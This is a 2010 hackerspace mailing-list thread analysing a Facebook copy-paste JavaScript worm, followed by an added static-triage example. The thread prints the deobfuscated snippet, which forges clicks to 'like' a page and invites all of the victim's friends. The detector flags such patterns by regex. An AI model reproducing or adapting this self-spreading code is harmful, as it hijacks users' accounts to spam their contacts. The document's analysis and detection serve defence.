[Noisebridge-discuss] What does this Facebook javascript malware do?

Alexander alxndr at gmail.com
Fri May 7 19:28:15 UTC 2010


I saw it get up to about 2200 fans before it got taken down.

On Fri, May 7, 2010 at 12:12, Lee Sonko <lee at lee.org> wrote:
> Brian, she will be much relieved to find out that this malware had no
> malicious payload.
>
>
> I see that Facebook removed the page as of noon. 1,600 infections in 3 hours
> via social engineering, a dumb Facebook page and a little snippet of
> javascript. Not bad.
>
>
>
>
>
> -----Original Message-----
> From: Brian Ferrell [mailto:endenizen at gmail.com]
> Sent: Friday, May 07, 2010 11:56 AM
> To: Lee Sonko
> Cc: NoiseBridge Discuss
> Subject: Re: [Noisebridge-discuss] What does this Facebook javascript
> malware do?
>
> For the curious... DON'T RUN THIS!
>
> Looks like it does just what you expect - 'likes' the app and suggests
> it to all your friends.
>
> document.getElementById('app117185681648577_cWsFYs').style = 'hidden';
> document.getElementById('app117185681648577_TPCCax').innerHTML =
> document.getElementById('app117185681648577_YbDOrx').value;
> s = document.getElementById('suggest');
> m = document.getElementById('likeme');
> c = document.createEvent('MouseEvents');
> c.initEvent('click', true, true);
> s.dispatchEvent(c);
>
> setTimeout(function() {
>  fs.select_all();
> }, 5000);
>
> setTimeout(function() {
>  SocialGraphManager.submitDialog('sgm_invite_form',
> '/ajax/social_graph/invite_dialog.php');
> }, 5000);
>
> setTimeout(function() {
>  m.dispatchEvent(c);
>  document.getElementById('app117185681648577_wNPOwN').innerHTML =
> document.getElementById('app117185681648577_djzaef').value;
> }, 5000);
>
> On Fri, May 7, 2010 at 11:30, Lee Sonko <lee at lee.org> wrote:
>> A friend received this Facebook malware. It told her to copy and paste the
>> malware below into her browser. She did :-(
>>
>>
>>
>> She tells me that it then pulled up a Facebook page and invited all her
>> Facebook friends to the malware page.
>>
>>
>>
>> Can you, the javascript enabled hacker, tell what it does? I'm guessing the
>> RegExp runs a substitution cipher on that long string of characters but I'm
>> lost from there.
>>
>>
>>
>> I've been watching the number of "People Like This" on the page grow from
>> 1,000 to 1,500 in the past 20 minutes.   :-(
>>
>>
>>
>>
>>
>> Find it at http://lee.org/temp/malware.txt
>>
>>
>>
>>
>>
>> Lee
>>
>> _______________________________________________
>> Noisebridge-discuss mailing list
>> Noisebridge-discuss at lists.noisebridge.net
>> https://www.noisebridge.net/mailman/listinfo/noisebridge-discuss
>>
>>
>

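The behaviour described in the quoted analysis (a click built and fired from script, followed by a deferred dialog submission) can be flagged by matching the text of a snippet without ever evaluating it. The following is an added example, not part of the original thread; `INDICATORS`, `triageSnippet` and the indicator ids are hypothetical names, and `SAMPLE` is a constructed excerpt of the code quoted above.

```javascript
// Added example: static triage of a pasted snippet. The text is only
// pattern-matched, never evaluated. All names here are hypothetical.
const INDICATORS = [
  { id: 'synthetic-event', re: /\b(?:createEvent|initEvent)\s*\(/ }, // event built in script
  { id: 'dispatch', re: /\.dispatchEvent\s*\(/ },     // event fired from script
  { id: 'delayed-action', re: /\bsetTimeout\s*\(/ },  // action deferred by a timer
  { id: 'dom-rewrite', re: /\.innerHTML\s*=(?!=)/ },  // page content overwritten
  { id: 'scripted-submit', re: /\bsubmit\w*\s*\(/i }, // form or dialog submitted from script
];

function triageSnippet(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    for (const { id, re } of INDICATORS) {
      if (re.test(text)) findings.push({ id, line: i + 1, text: text.trim() });
    }
  });
  const ids = [...new Set(findings.map((f) => f.id))].sort();
  // An event that is both created and dispatched in script is a click the
  // user never made.
  const forgedClick = ids.includes('synthetic-event') && ids.includes('dispatch');
  // Combined with a scripted submission, the snippet acts in the user's name.
  const actsForUser = forgedClick && ids.includes('scripted-submit');
  return { findings, ids, forgedClick, actsForUser };
}

// Constructed sample: lines taken from the snippet quoted in the thread.
const SAMPLE = [
  "s = document.getElementById('suggest');",
  "c = document.createEvent('MouseEvents');",
  "c.initEvent('click', true, true);",
  "s.dispatchEvent(c);",
  "setTimeout(function() {",
  "  SocialGraphManager.submitDialog('sgm_invite_form', '/ajax/social_graph/invite_dialog.php');",
  "}, 5000);",
].join('\n');

// Constructed benign line: rewrites the DOM but forges no user action.
const BENIGN = "document.getElementById('status').innerHTML = 'Saved';";

console.log(triageSnippet(SAMPLE).ids, triageSnippet(BENIGN).ids);
```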